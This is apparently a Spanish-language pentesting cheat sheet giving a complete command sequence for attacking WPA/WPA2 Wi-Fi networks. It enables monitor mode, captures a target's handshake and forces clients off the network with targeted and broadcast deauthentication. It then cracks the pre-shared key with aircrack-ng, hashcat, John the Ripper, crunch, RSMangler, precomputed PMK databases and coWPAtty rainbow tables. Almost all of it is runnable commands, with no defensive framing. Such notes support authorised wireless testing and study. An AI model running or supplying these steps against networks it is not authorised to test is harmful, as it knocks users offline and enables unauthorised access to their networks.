WPA/WPA2

WPA, Wi-Fi Protected Access.

Habilitar modo monitor en tarjeta inalámbrica.

sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info

Captura de paquetes para identificar BSSID, ESSID y canal objetivo.

sudo airodump-ng <interface-mon>

Captura de paquetes de BSSID, ESSID y canal específico.

sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcap

Desautenticación de cliente(s).

# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>

# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>

Cracking con Aircrack-ng.

# Wordlist
aircrack-ng -b <BSSID> -e <ESSID> -w <path-wordlist> <file-name>.cap

# John the Ripper y Aircrack-ng
john --wordlist=<path-wordlist> --rules --stdout | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap

# crunch y Aircrack-ng
crunch <min-word-length> <max-word-length> -t <word>%%% | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap

# RSMangler y Aircrack-ng
rsmangler --file <words.txt> --min <min-word-length> --max <max-word-length> | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap

Cracking con Hashcat.

hcxpcapngtool -o hash.hc22000 <file-name>.cap
hashcat -m 22000 hash.hc22000 <path-wordlist>
hashcat -m 22000 hash.hc22000 --show

Cracking con Precálculo de Pairwise Master Keys (PMK).

# Creación de archivo de con nombre de ESSID
echo "<ESSID>" > essid.txt

# Importar ESSID a base de datos de Airolib-ng
airolib-ng <database-name>.sqlite --import essid essid.txt

# Obtener estadísticas de la base de datos
airolib-ng <database-name>.sqlite --stats

# Importar wordlist de contraseñas a base de datos
airolib-ng <database-name>.sqlite --import passwd <path-wordlist>

# Procesar y generar Pairwise Master Keys (PMK)
airolib-ng <database-name>.sqlite --batch

# Cracking con precálculo de Pairwise Master Keys (PMK)
aircrack-ng -r <database-name>.sqlite <file-name>.cap

Rainbow table.

# Generación de rainbow table
genpmk -f <path-wordlist> -d hashes -s <ESSID>

# Cracking con coWPAtty utilizando rainbow table
cowpatty -r <file-name>.cap -d hashes -s <ESSID>

Confirmar que la clave obtenida es correcta.

airdecap-ng -b <BSSID> -e <ESSID> -p <password> <file-name>.cap

Última actualización